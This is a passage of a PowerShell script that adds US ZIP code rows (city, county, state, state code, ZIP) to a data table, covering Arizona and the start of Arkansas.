$Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85207") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85208") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85210") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85212") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85213") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85215") + $null = $Cities.Rows.Add("Gold canyon","Pinal","Arizona","AZ","4","85219") + $null = $Cities.Rows.Add("Apache junction","Pinal","Arizona","AZ","4","85220") + $null = $Cities.Rows.Add("Bapchule","Pinal","Arizona","AZ","4","85221") + $null = $Cities.Rows.Add("Eleven mile corn","Pinal","Arizona","AZ","4","85222") + $null = $Cities.Rows.Add("Arizona city","Pinal","Arizona","AZ","4","85223") + $null = $Cities.Rows.Add("Chandler","Maricopa","Arizona","AZ","4","85224") + $null = $Cities.Rows.Add("Chandler","Maricopa","Arizona","AZ","4","85225") + $null = $Cities.Rows.Add("Chandler","Maricopa","Arizona","AZ","4","85226") + $null = $Cities.Rows.Add("Coolidge","Pinal","Arizona","AZ","4","85228") + $null = $Cities.Rows.Add("Casa grande","Pinal","Arizona","AZ","4","85230") + $null = $Cities.Rows.Add("Eloy","Pinal","Arizona","AZ","4","85231") + $null = $Cities.Rows.Add("Florence","Pinal","Arizona","AZ","4","85232") + $null = $Cities.Rows.Add("Gilbert","Maricopa","Arizona","AZ","4","85233") + $null = $Cities.Rows.Add("Gilbert","Maricopa","Arizona","AZ","4","85234") + $null = $Cities.Rows.Add("Hayden","Gila","Arizona","AZ","4","85235") + $null = $Cities.Rows.Add("Higley","Maricopa","Arizona","AZ","4","85236") + $null = $Cities.Rows.Add("Kearny","Pinal","Arizona","AZ","4","85237") + $null = $Cities.Rows.Add("Mobile","Pinal","Arizona","AZ","4","85239") + $null = $Cities.Rows.Add("Picacho","Pinal","Arizona","AZ","4","85241") + $null = $Cities.Rows.Add("Arizona boys ran","Maricopa","Arizona","AZ","4","85242") + $null = $Cities.Rows.Add("Red rock","Pinal","Arizona","AZ","4","85245") + $null = $Cities.Rows.Add("Sacaton","Pinal","Arizona","AZ","4","85247") + $null = $Cities.Rows.Add("Sun lakes","Maricopa","Arizona","AZ","4","85248") + $null = $Cities.Rows.Add("Chandler","Maricopa","Arizona","AZ","4","85249") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85250") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85251") + $null = $Cities.Rows.Add("Paradise valley","Maricopa","Arizona","AZ","4","85253") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85254") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85255") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85256") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85257") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85258") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85259") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85260") + $null = $Cities.Rows.Add("Scottsdale","Maricopa","Arizona","AZ","4","85262") + $null = $Cities.Rows.Add("Rio verde","Maricopa","Arizona","AZ","4","85263") + $null = $Cities.Rows.Add("Fort mcdowell","Maricopa","Arizona","AZ","4","85264") + $null = $Cities.Rows.Add("Fountain hills","Maricopa","Arizona","AZ","4","85268") + $null = $Cities.Rows.Add("Stanfield","Pinal","Arizona","AZ","4","85272") + $null = $Cities.Rows.Add("Superior","Pinal","Arizona","AZ","4","85273") + $null = $Cities.Rows.Add("Tempe","Maricopa","Arizona","AZ","4","85281") + $null = $Cities.Rows.Add("Tempe","Maricopa","Arizona","AZ","4","85282") + $null = $Cities.Rows.Add("Tempe","Maricopa","Arizona","AZ","4","85283") + $null = $Cities.Rows.Add("Tempe","Maricopa","Arizona","AZ","4","85284") + $null = $Cities.Rows.Add("Winkelman","Pinal","Arizona","AZ","4","85292") + $null = $Cities.Rows.Add("Gilbert","Maricopa","Arizona","AZ","4","85296") + $null = $Cities.Rows.Add("Zcta 852hh","Maricopa","Arizona","AZ","4","852HH") + $null = $Cities.Rows.Add("Zcta 852xx","Pinal","Arizona","AZ","4","852XX") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85301") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85302") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85303") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85304") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85305") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85306") + $null = $Cities.Rows.Add("Luke afb","Maricopa","Arizona","AZ","4","85307") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85308") + $null = $Cities.Rows.Add("Luke afb","Maricopa","Arizona","AZ","4","85309") + $null = $Cities.Rows.Add("Glendale","Maricopa","Arizona","AZ","4","85310") + $null = $Cities.Rows.Add("Aguila","Maricopa","Arizona","AZ","4","85320") + $null = $Cities.Rows.Add("Why","Pima","Arizona","AZ","4","85321") + $null = $Cities.Rows.Add("Arlington","Maricopa","Arizona","AZ","4","85322") + $null = $Cities.Rows.Add("Avondale","Maricopa","Arizona","AZ","4","85323") + $null = $Cities.Rows.Add("Rock springs","Yavapai","Arizona","AZ","4","85324") + $null = $Cities.Rows.Add("Bouse","La Paz","Arizona","AZ","4","85325") + $null = $Cities.Rows.Add("Buckeye","Maricopa","Arizona","AZ","4","85326") + $null = $Cities.Rows.Add("Cibola","La Paz","Arizona","AZ","4","85328") + $null = $Cities.Rows.Add("Cashion","Maricopa","Arizona","AZ","4","85329") + $null = $Cities.Rows.Add("Cave creek","Maricopa","Arizona","AZ","4","85331") + $null = $Cities.Rows.Add("Congress","Yavapai","Arizona","AZ","4","85332") + $null = $Cities.Rows.Add("Dateland","Yuma","Arizona","AZ","4","85333") + $null = $Cities.Rows.Add("Ehrenberg","La Paz","Arizona","AZ","4","85334") + $null = $Cities.Rows.Add("El mirage","Maricopa","Arizona","AZ","4","85335") + $null = $Cities.Rows.Add("Gadsden","Yuma","Arizona","AZ","4","85336") + $null = $Cities.Rows.Add("Gila bend","Maricopa","Arizona","AZ","4","85337") + $null = $Cities.Rows.Add("Goodyear","Maricopa","Arizona","AZ","4","85338") + $null = $Cities.Rows.Add("Laveen","Maricopa","Arizona","AZ","4","85339") + $null = $Cities.Rows.Add("Litchfield park","Maricopa","Arizona","AZ","4","85340") + $null = $Cities.Rows.Add("Morristown","Maricopa","Arizona","AZ","4","85342") + $null = $Cities.Rows.Add("Empire landing","La Paz","Arizona","AZ","4","85344") + $null = $Cities.Rows.Add("Peoria","Maricopa","Arizona","AZ","4","85345") + $null = $Cities.Rows.Add("Quartzsite","La Paz","Arizona","AZ","4","85346") + $null = $Cities.Rows.Add("Roll","Yuma","Arizona","AZ","4","85347") + $null = $Cities.Rows.Add("Salome","La Paz","Arizona","AZ","4","85348") + $null = $Cities.Rows.Add("San luis","Yuma","Arizona","AZ","4","85349") + $null = $Cities.Rows.Add("Somerton","Yuma","Arizona","AZ","4","85350") + $null = $Cities.Rows.Add("Sun city","Maricopa","Arizona","AZ","4","85351") + $null = $Cities.Rows.Add("Tolleson","Maricopa","Arizona","AZ","4","85353") + $null = $Cities.Rows.Add("Tonopah","Maricopa","Arizona","AZ","4","85354") + $null = $Cities.Rows.Add("Waddell","Maricopa","Arizona","AZ","4","85355") + $null = $Cities.Rows.Add("Wellton","Yuma","Arizona","AZ","4","85356") + $null = $Cities.Rows.Add("Wenden","La Paz","Arizona","AZ","4","85357") + $null = $Cities.Rows.Add("Wikieup","Mohave","Arizona","AZ","4","85360") + $null = $Cities.Rows.Add("Wittmann","Maricopa","Arizona","AZ","4","85361") + $null = $Cities.Rows.Add("Yarnell","Yavapai","Arizona","AZ","4","85362") + $null = $Cities.Rows.Add("Youngtown","Maricopa","Arizona","AZ","4","85363") + $null = $Cities.Rows.Add("Yuma","Yuma","Arizona","AZ","4","85364") + $null = $Cities.Rows.Add("Yuma proving gro","Yuma","Arizona","AZ","4","85365") + $null = $Cities.Rows.Add("Yuma","Yuma","Arizona","AZ","4","85367") + $null = $Cities.Rows.Add("Sun city","Maricopa","Arizona","AZ","4","85373") + $null = $Cities.Rows.Add("Surprise","Maricopa","Arizona","AZ","4","85374") + $null = $Cities.Rows.Add("Sun city west","Maricopa","Arizona","AZ","4","85375") + $null = $Cities.Rows.Add("Zcta 85379","Maricopa","Arizona","AZ","4","85379") + $null = $Cities.Rows.Add("Peoria","Maricopa","Arizona","AZ","4","85381") + $null = $Cities.Rows.Add("Peoria","Maricopa","Arizona","AZ","4","85382") + $null = $Cities.Rows.Add("Wickenburg","Maricopa","Arizona","AZ","4","85390") + $null = $Cities.Rows.Add("Zcta 853hh","La Paz","Arizona","AZ","4","853HH") + $null = $Cities.Rows.Add("Zcta 853xx","La Paz","Arizona","AZ","4","853XX") + $null = $Cities.Rows.Add("Globe","Gila","Arizona","AZ","4","85501") + $null = $Cities.Rows.Add("Bylas","Graham","Arizona","AZ","4","85530") + $null = $Cities.Rows.Add("Central","Graham","Arizona","AZ","4","85531") + $null = $Cities.Rows.Add("Clifton","Greenlee","Arizona","AZ","4","85533") + $null = $Cities.Rows.Add("Franklin","Greenlee","Arizona","AZ","4","85534") + $null = $Cities.Rows.Add("Eden","Graham","Arizona","AZ","4","85535") + $null = $Cities.Rows.Add("Fort thomas","Graham","Arizona","AZ","4","85536") + $null = $Cities.Rows.Add("Miami","Gila","Arizona","AZ","4","85539") + $null = $Cities.Rows.Add("Morenci","Greenlee","Arizona","AZ","4","85540") + $null = $Cities.Rows.Add("Payson","Gila","Arizona","AZ","4","85541") + $null = $Cities.Rows.Add("Peridot","Graham","Arizona","AZ","4","85542") + $null = $Cities.Rows.Add("Pima","Graham","Arizona","AZ","4","85543") + $null = $Cities.Rows.Add("Strawberry","Gila","Arizona","AZ","4","85544") + $null = $Cities.Rows.Add("Roosevelt","Gila","Arizona","AZ","4","85545") + $null = $Cities.Rows.Add("Safford","Graham","Arizona","AZ","4","85546") + $null = $Cities.Rows.Add("San carlos","Gila","Arizona","AZ","4","85550") + $null = $Cities.Rows.Add("Thatcher","Graham","Arizona","AZ","4","85552") + $null = $Cities.Rows.Add("Tonto basin","Gila","Arizona","AZ","4","85553") + $null = $Cities.Rows.Add("Young","Gila","Arizona","AZ","4","85554") + $null = $Cities.Rows.Add("Zcta 855hh","Gila","Arizona","AZ","4","855HH") + $null = $Cities.Rows.Add("Zcta 855xx","Graham","Arizona","AZ","4","855XX") + $null = $Cities.Rows.Add("Arivaca","Pima","Arizona","AZ","4","85601") + $null = $Cities.Rows.Add("Benson","Cochise","Arizona","AZ","4","85602") + $null = $Cities.Rows.Add("Bisbee","Cochise","Arizona","AZ","4","85603") + $null = $Cities.Rows.Add("Bowie","Cochise","Arizona","AZ","4","85605") + $null = $Cities.Rows.Add("Cochise","Cochise","Arizona","AZ","4","85606") + $null = $Cities.Rows.Add("Douglas","Cochise","Arizona","AZ","4","85607") + $null = $Cities.Rows.Add("Douglas","Cochise","Arizona","AZ","4","85608") + $null = $Cities.Rows.Add("Dragoon","Cochise","Arizona","AZ","4","85609") + $null = $Cities.Rows.Add("Elfrida","Cochise","Arizona","AZ","4","85610") + $null = $Cities.Rows.Add("Elgin","Santa Cruz","Arizona","AZ","4","85611") + $null = $Cities.Rows.Add("Fort huachuca","Cochise","Arizona","AZ","4","85613") + $null = $Cities.Rows.Add("Green valley","Pima","Arizona","AZ","4","85614") + $null = $Cities.Rows.Add("Hereford","Cochise","Arizona","AZ","4","85615") + $null = $Cities.Rows.Add("Huachuca city","Cochise","Arizona","AZ","4","85616") + $null = $Cities.Rows.Add("Mc neal","Cochise","Arizona","AZ","4","85617") + $null = $Cities.Rows.Add("Mammoth","Pinal","Arizona","AZ","4","85618") + $null = $Cities.Rows.Add("Mount lemmon","Pima","Arizona","AZ","4","85619") + $null = $Cities.Rows.Add("Nogales","Santa Cruz","Arizona","AZ","4","85621") + $null = $Cities.Rows.Add("Oracle","Pinal","Arizona","AZ","4","85623") + $null = $Cities.Rows.Add("Patagonia","Santa Cruz","Arizona","AZ","4","85624") + $null = $Cities.Rows.Add("Pearce","Cochise","Arizona","AZ","4","85625") + $null = $Cities.Rows.Add("Pomerene","Cochise","Arizona","AZ","4","85627") + $null = $Cities.Rows.Add("Sahuarita","Pima","Arizona","AZ","4","85629") + $null = $Cities.Rows.Add("Saint david","Cochise","Arizona","AZ","4","85630") + $null = $Cities.Rows.Add("San manuel","Pinal","Arizona","AZ","4","85631") + $null = $Cities.Rows.Add("Portal","Cochise","Arizona","AZ","4","85632") + $null = $Cities.Rows.Add("Sasabe","Pima","Arizona","AZ","4","85633") + $null = $Cities.Rows.Add("Pisinemo","Pima","Arizona","AZ","4","85634") + $null = $Cities.Rows.Add("Sierra vista","Cochise","Arizona","AZ","4","85635") + $null = $Cities.Rows.Add("Sonoita","Santa Cruz","Arizona","AZ","4","85637") + $null = $Cities.Rows.Add("Tombstone","Cochise","Arizona","AZ","4","85638") + $null = $Cities.Rows.Add("Topawa","Pima","Arizona","AZ","4","85639") + $null = $Cities.Rows.Add("Amado","Santa Cruz","Arizona","AZ","4","85640") + $null = $Cities.Rows.Add("Vail","Pima","Arizona","AZ","4","85641") + $null = $Cities.Rows.Add("Willcox","Cochise","Arizona","AZ","4","85643") + $null = $Cities.Rows.Add("Amado","Pima","Arizona","AZ","4","85645") + $null = $Cities.Rows.Add("Tubac","Santa Cruz","Arizona","AZ","4","85646") + $null = $Cities.Rows.Add("Rio rico","Santa Cruz","Arizona","AZ","4","85648") + $null = $Cities.Rows.Add("Zcta 85650","Cochise","Arizona","AZ","4","85650") + $null = $Cities.Rows.Add("Marana","Pima","Arizona","AZ","4","85653") + $null = $Cities.Rows.Add("Rillito","Pima","Arizona","AZ","4","85654") + $null = $Cities.Rows.Add("Zcta 856hh","Cochise","Arizona","AZ","4","856HH") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85701") + $null = $Cities.Rows.Add("Casas adobes","Pima","Arizona","AZ","4","85704") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85705") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85706") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85708") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85710") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85711") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85712") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85713") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85714") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85715") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85716") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85718") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85719") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85730") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85735") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85736") + $null = $Cities.Rows.Add("Oro valley","Pima","Arizona","AZ","4","85737") + $null = $Cities.Rows.Add("Zcta 85739","Pima","Arizona","AZ","4","85739") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85741") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85742") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85743") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85745") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85746") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85747") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85748") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85749") + $null = $Cities.Rows.Add("Tucson","Pima","Arizona","AZ","4","85750") + $null = $Cities.Rows.Add("Show low","Navajo","Arizona","AZ","4","85901") + $null = $Cities.Rows.Add("Cibeque","Navajo","Arizona","AZ","4","85911") + $null = $Cities.Rows.Add("Alpine","Apache","Arizona","AZ","4","85920") + $null = $Cities.Rows.Add("Blue","Greenlee","Arizona","AZ","4","85922") + $null = $Cities.Rows.Add("Clay springs","Navajo","Arizona","AZ","4","85923") + $null = $Cities.Rows.Add("Concho","Apache","Arizona","AZ","4","85924") + $null = $Cities.Rows.Add("Eagar","Apache","Arizona","AZ","4","85925") + $null = $Cities.Rows.Add("Fort apache","Navajo","Arizona","AZ","4","85926") + $null = $Cities.Rows.Add("Greer","Apache","Arizona","AZ","4","85927") + $null = $Cities.Rows.Add("Heber","Navajo","Arizona","AZ","4","85928") + $null = $Cities.Rows.Add("Lakeside","Navajo","Arizona","AZ","4","85929") + $null = $Cities.Rows.Add("Mc nary","Apache","Arizona","AZ","4","85930") + $null = $Cities.Rows.Add("Forest lakes","Coconino","Arizona","AZ","4","85931") + $null = $Cities.Rows.Add("Nutrioso","Apache","Arizona","AZ","4","85932") + $null = $Cities.Rows.Add("Overgaard","Navajo","Arizona","AZ","4","85933") + $null = $Cities.Rows.Add("Pinedale","Navajo","Arizona","AZ","4","85934") + $null = $Cities.Rows.Add("Pinetop","Navajo","Arizona","AZ","4","85935") + $null = $Cities.Rows.Add("Saint johns","Apache","Arizona","AZ","4","85936") + $null = $Cities.Rows.Add("Snowflake","Navajo","Arizona","AZ","4","85937") + $null = $Cities.Rows.Add("Springerville","Apache","Arizona","AZ","4","85938") + $null = $Cities.Rows.Add("Taylor","Navajo","Arizona","AZ","4","85939") + $null = $Cities.Rows.Add("Vernon","Apache","Arizona","AZ","4","85940") + $null = $Cities.Rows.Add("Whiteriver","Navajo","Arizona","AZ","4","85941") + $null = $Cities.Rows.Add("Woodruff","Navajo","Arizona","AZ","4","85942") + $null = $Cities.Rows.Add("Flagstaff","Coconino","Arizona","AZ","4","86001") + $null = $Cities.Rows.Add("Flagstaff","Coconino","Arizona","AZ","4","86004") + $null = $Cities.Rows.Add("Bellemont","Coconino","Arizona","AZ","4","86015") + $null = $Cities.Rows.Add("Gray mountain","Coconino","Arizona","AZ","4","86016") + $null = $Cities.Rows.Add("Munds park","Coconino","Arizona","AZ","4","86017") + $null = $Cities.Rows.Add("Parks","Coconino","Arizona","AZ","4","86018") + $null = $Cities.Rows.Add("Cameron","Coconino","Arizona","AZ","4","86020") + $null = $Cities.Rows.Add("Colorado city","Mohave","Arizona","AZ","4","86021") + $null = $Cities.Rows.Add("Fredonia","Coconino","Arizona","AZ","4","86022") + $null = $Cities.Rows.Add("Grand canyon","Coconino","Arizona","AZ","4","86023") + $null = $Cities.Rows.Add("Happy jack","Coconino","Arizona","AZ","4","86024") + $null = $Cities.Rows.Add("Holbrook","Navajo","Arizona","AZ","4","86025") + $null = $Cities.Rows.Add("Hotevilla","Navajo","Arizona","AZ","4","86030") + $null = $Cities.Rows.Add("Indian wells","Navajo","Arizona","AZ","4","86031") + $null = $Cities.Rows.Add("Joseph city","Navajo","Arizona","AZ","4","86032") + $null = $Cities.Rows.Add("Kayenta","Navajo","Arizona","AZ","4","86033") + $null = $Cities.Rows.Add("Keams canyon","Navajo","Arizona","AZ","4","86034") + $null = $Cities.Rows.Add("Leupp","Coconino","Arizona","AZ","4","86035") + $null = $Cities.Rows.Add("Marble canyon","Coconino","Arizona","AZ","4","86036") + $null = $Cities.Rows.Add("Kykotsmovi villa","Navajo","Arizona","AZ","4","86039") + $null = $Cities.Rows.Add("Greenehaven","Coconino","Arizona","AZ","4","86040") + $null = $Cities.Rows.Add("Polacca","Navajo","Arizona","AZ","4","86042") + $null = $Cities.Rows.Add("Second mesa","Navajo","Arizona","AZ","4","86043") + $null = $Cities.Rows.Add("Tonalea","Coconino","Arizona","AZ","4","86044") + $null = $Cities.Rows.Add("Tuba city","Coconino","Arizona","AZ","4","86045") + $null = $Cities.Rows.Add("Williams","Coconino","Arizona","AZ","4","86046") + $null = $Cities.Rows.Add("Winslow","Navajo","Arizona","AZ","4","86047") + $null = $Cities.Rows.Add("North rim","Coconino","Arizona","AZ","4","86052") + $null = $Cities.Rows.Add("Kaibito","Coconino","Arizona","AZ","4","86053") + $null = $Cities.Rows.Add("Shonto","Navajo","Arizona","AZ","4","86054") + $null = $Cities.Rows.Add("Zcta 860hh","Coconino","Arizona","AZ","4","860HH") + $null = $Cities.Rows.Add("Zcta 860xx","Coconino","Arizona","AZ","4","860XX") + $null = $Cities.Rows.Add("Prescott","Yavapai","Arizona","AZ","4","86301") + $null = $Cities.Rows.Add("Groom creek","Yavapai","Arizona","AZ","4","86303") + $null = $Cities.Rows.Add("Zcta 86305","Yavapai","Arizona","AZ","4","86305") + $null = $Cities.Rows.Add("Prescott valley","Yavapai","Arizona","AZ","4","86314") + $null = $Cities.Rows.Add("Ash fork","Yavapai","Arizona","AZ","4","86320") + $null = $Cities.Rows.Add("Bagdad","Yavapai","Arizona","AZ","4","86321") + $null = $Cities.Rows.Add("Camp verde","Yavapai","Arizona","AZ","4","86322") + $null = $Cities.Rows.Add("Chino valley","Yavapai","Arizona","AZ","4","86323") + $null = $Cities.Rows.Add("Clarkdale","Yavapai","Arizona","AZ","4","86324") + $null = $Cities.Rows.Add("Cornville","Yavapai","Arizona","AZ","4","86325") + $null = $Cities.Rows.Add("Cottonwood","Yavapai","Arizona","AZ","4","86326") + $null = $Cities.Rows.Add("Dewey","Yavapai","Arizona","AZ","4","86327") + $null = $Cities.Rows.Add("Jerome","Yavapai","Arizona","AZ","4","86331") + $null = $Cities.Rows.Add("Kirkland","Yavapai","Arizona","AZ","4","86332") + $null = $Cities.Rows.Add("Mayer","Yavapai","Arizona","AZ","4","86333") + $null = $Cities.Rows.Add("Paulden","Yavapai","Arizona","AZ","4","86334") + $null = $Cities.Rows.Add("Rimrock","Yavapai","Arizona","AZ","4","86335") + $null = $Cities.Rows.Add("Sedona","Yavapai","Arizona","AZ","4","86336") + $null = $Cities.Rows.Add("Seligman","Yavapai","Arizona","AZ","4","86337") + $null = $Cities.Rows.Add("Skull valley","Yavapai","Arizona","AZ","4","86338") + $null = $Cities.Rows.Add("Crown king","Yavapai","Arizona","AZ","4","86343") + $null = $Cities.Rows.Add("Sedona","Yavapai","Arizona","AZ","4","86351") + $null = $Cities.Rows.Add("Kingman","Mohave","Arizona","AZ","4","86401") + $null = $Cities.Rows.Add("Desert hills","Mohave","Arizona","AZ","4","86403") + $null = $Cities.Rows.Add("Lake havasu city","Mohave","Arizona","AZ","4","86404") + $null = $Cities.Rows.Add("Lake havasu city","Mohave","Arizona","AZ","4","86406") + $null = $Cities.Rows.Add("Golden valley","Mohave","Arizona","AZ","4","86413") + $null = $Cities.Rows.Add("Bullhead city","Mohave","Arizona","AZ","4","86426") + $null = $Cities.Rows.Add("Bullhead city","Mohave","Arizona","AZ","4","86429") + $null = $Cities.Rows.Add("Bullhead city","Mohave","Arizona","AZ","4","86430") + $null = $Cities.Rows.Add("Chloride","Mohave","Arizona","AZ","4","86431") + $null = $Cities.Rows.Add("Littlefield","Mohave","Arizona","AZ","4","86432") + $null = $Cities.Rows.Add("Oatman","Mohave","Arizona","AZ","4","86433") + $null = $Cities.Rows.Add("Peach springs","Mohave","Arizona","AZ","4","86434") + $null = $Cities.Rows.Add("Supai","Coconino","Arizona","AZ","4","86435") + $null = $Cities.Rows.Add("Topock","Mohave","Arizona","AZ","4","86436") + $null = $Cities.Rows.Add("Valentine","Mohave","Arizona","AZ","4","86437") + $null = $Cities.Rows.Add("Yucca","Mohave","Arizona","AZ","4","86438") + $null = $Cities.Rows.Add("Mohave valley","Mohave","Arizona","AZ","4","86440") + $null = $Cities.Rows.Add("Dolan springs","Mohave","Arizona","AZ","4","86441") + $null = $Cities.Rows.Add("Bullhead city","Mohave","Arizona","AZ","4","86442") + $null = $Cities.Rows.Add("Meadview","Mohave","Arizona","AZ","4","86444") + $null = $Cities.Rows.Add("Zcta 864hh","Mohave","Arizona","AZ","4","864HH") + $null = $Cities.Rows.Add("Zcta 864xx","Mohave","Arizona","AZ","4","864XX") + $null = $Cities.Rows.Add("Chambers","Apache","Arizona","AZ","4","86502") + $null = $Cities.Rows.Add("Chinle","Apache","Arizona","AZ","4","86503") + $null = $Cities.Rows.Add("Fort defiance","Apache","Arizona","AZ","4","86504") + $null = $Cities.Rows.Add("Ganado","Apache","Arizona","AZ","4","86505") + $null = $Cities.Rows.Add("Houck","Apache","Arizona","AZ","4","86506") + $null = $Cities.Rows.Add("Lukachukai","Apache","Arizona","AZ","4","86507") + $null = $Cities.Rows.Add("Lupton","Apache","Arizona","AZ","4","86508") + $null = $Cities.Rows.Add("Pinon","Navajo","Arizona","AZ","4","86510") + $null = $Cities.Rows.Add("Saint michaels","Apache","Arizona","AZ","4","86511") + $null = $Cities.Rows.Add("Sanders","Apache","Arizona","AZ","4","86512") + $null = $Cities.Rows.Add("Teec nos pos","Apache","Arizona","AZ","4","86514") + $null = $Cities.Rows.Add("Window rock","Apache","Arizona","AZ","4","86515") + $null = $Cities.Rows.Add("Blue gap","Apache","Arizona","AZ","4","86520") + $null = $Cities.Rows.Add("Dennehotso","Apache","Arizona","AZ","4","86535") + $null = $Cities.Rows.Add("Many farms","Apache","Arizona","AZ","4","86538") + $null = $Cities.Rows.Add("Nazlini","Apache","Arizona","AZ","4","86540") + $null = $Cities.Rows.Add("Red valley","Apache","Arizona","AZ","4","86544") + $null = $Cities.Rows.Add("Rock point","Apache","Arizona","AZ","4","86545") + $null = $Cities.Rows.Add("Round rock","Apache","Arizona","AZ","4","86547") + $null = $Cities.Rows.Add("Sawmill","Apache","Arizona","AZ","4","86549") + $null = $Cities.Rows.Add("Tsaile","Apache","Arizona","AZ","4","86556") + $null = $Cities.Rows.Add("","Apache","Arizona","AZ","4","87328") + $null = $Cities.Rows.Add("","Mohave","Arizona","AZ","4","89024") + $null = $Cities.Rows.Add("","Mississippi","Arkansas","AR","5","38041") + $null = $Cities.Rows.Add("","Mississippi","Arkansas","AR","5","38063") + $null = $Cities.Rows.Add("","Mississippi","Arkansas","AR","5","380HH") + $null = $Cities.Rows.Add("","Marion","Arkansas","AR","5","65733") + $null = $Cities.Rows.Add("","Marion","Arkansas","AR","5","65761") + $null = $Cities.Rows.Add("","Marion","Arkansas","AR","5","657HH") + $null = $Cities.Rows.Add("North cedar","Jefferson","Arkansas","AR","5","71601") + $null = $Cities.Rows.Add("Dollarway","Jefferson","Arkansas","AR","5","71602") + $null = $Cities.Rows.Add("Pine bluff","Jefferson","Arkansas","AR","5","71603") + $null = $Cities.Rows.Add("Arkansas city","Desha","Arkansas","AR","5","71630") + $null = $Cities.Rows.Add("Banks","Bradley","Arkansas","AR","5","71631") + $null = $Cities.Rows.Add("North","Ashley","Arkansas","AR","5","71635") + $null = $Cities.Rows.Add("Dermott","Chicot","Arkansas","AR","5","71638") + $null = $Cities.Rows.Add("Dumas","Desha","Arkansas","AR","5","71639") + $null = $Cities.Rows.Add("Eudora","Chicot","Arkansas","AR","5","71640") + $null = $Cities.Rows.Add("Fountain hill","Ashley","Arkansas","AR","5","71642") + $null = $Cities.Rows.Add("Gould","Lincoln","Arkansas","AR","5","71643") + $null = $Cities.Rows.Add("Tamo","Lincoln","Arkansas","AR","5","71644") + $null = $Cities.Rows.Add("Hamburg","Ashley","Arkansas","AR","5","71646") + $null = $Cities.Rows.Add("Ingalls","Bradley","Arkansas","AR","5","71647") + $null = $Cities.Rows.Add("Jersey","Bradley","Arkansas","AR","5","71651") + $null = $Cities.Rows.Add("Kingsland","Cleveland","Arkansas","AR","5","71652") + $null = $Cities.Rows.Add("Lake village","Chicot","Arkansas","AR","5","71653") + $null = $Cities.Rows.Add("Mc gehee","Desha","Arkansas","AR","5","71654") + $null = $Cities.Rows.Add("Monticello","Drew","Arkansas","AR","5","71655") + $null = $Cities.Rows.Add("University of ar","Drew","Arkansas","AR","5","71656") + $null = $Cities.Rows.Add("Montrose","Ashley","Arkansas","AR","5","71658") + $null = $Cities.Rows.Add("Moscow","Jefferson","Arkansas","AR","5","71659") + $null = $Cities.Rows.Add("New edinburg","Cleveland","Arkansas","AR","5","71660") + $null = $Cities.Rows.Add("Parkdale","Ashley","Arkansas","AR","5","71661") + $null = $Cities.Rows.Add("Portland","Ashley","Arkansas","AR","5","71663") + $null = $Cities.Rows.Add("Rison","Cleveland","Arkansas","AR","5","71665") + $null = $Cities.Rows.Add("Rohwer","Desha","Arkansas","AR","5","71666") + $null = $Cities.Rows.Add("Star city","Lincoln","Arkansas","AR","5","71667") + $null = $Cities.Rows.Add("Reed","Desha","Arkansas","AR","5","71670") + $null = $Cities.Rows.Add("Warren","Bradley","Arkansas","AR","5","71671") + $null = $Cities.Rows.Add("Watson","Desha","Arkansas","AR","5","71674") + $null = $Cities.Rows.Add("Wilmar","Drew","Arkansas","AR","5","71675") + $null = $Cities.Rows.Add("Wilmot","Ashley","Arkansas","AR","5","71676") + $null = $Cities.Rows.Add("Winchester","Drew","Arkansas","AR","5","71677") + $null = $Cities.Rows.Add("Zcta 716hh","Ashley","Arkansas","AR","5","716HH") + $null = 